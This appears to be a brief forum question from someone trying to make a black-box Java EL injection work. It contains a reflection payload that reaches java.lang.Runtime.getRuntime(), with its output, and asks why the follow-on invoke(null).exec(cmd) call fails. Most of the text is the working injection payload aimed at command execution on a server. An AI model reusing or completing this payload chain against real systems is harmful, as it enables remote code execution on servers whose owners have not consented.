Trying to get a black box Java EL injection to work, this works:
$\\A{'a'.getClass().forName('java.lang.Runtime').getMethods()[6]}
-> Apublic static java.lang.Runtime java.lang.Runtime.getRuntime()]
But this does not, any idea why?
(..).getMethods()[6].invoke(null).exec(cmd)